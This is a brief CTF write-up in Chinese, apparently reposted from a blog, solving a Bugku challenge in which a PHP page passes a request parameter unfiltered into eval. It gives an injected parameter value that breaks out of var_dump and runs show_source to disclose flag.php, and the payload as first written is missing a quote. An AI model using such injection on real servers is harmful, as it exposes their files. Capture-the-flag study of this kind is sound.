Bugku_CTF Writeup 之 文件包含(60)

题目说明:

地址:http://120.24.86.145:8003/

1. 打开页面发现给出了php源码

1 <?php 
2     include "flag.php"; 
3     $a = @$_REQUEST['hello']; 
4     eval( "var_dump($a);"); 
5     show_source(__FILE__); 
6 ?>

2.flag应该在flag.php里,想办法将其爆出

  (1)a变量由$_REQUEST变量获取,可以用GET或POST方法为hello赋值进而为$a赋值

  (2)程序并未对hello的输入进行判断过滤

  (3)eval函数中执行的命令进而可以被$a的值所决定

3.类似于构造SQL注入语句,构造hello的值为        1);show_source("flag.php);var_dump(1

  GET方法传参后,eval函数实际执行的命令是  var_dump(1);show_source("flag.php");var_dump(1);
  即可得到flag.php的源码并得到flag

猜你喜欢

转载自www.cnblogs.com/izayoi/p/9578122.html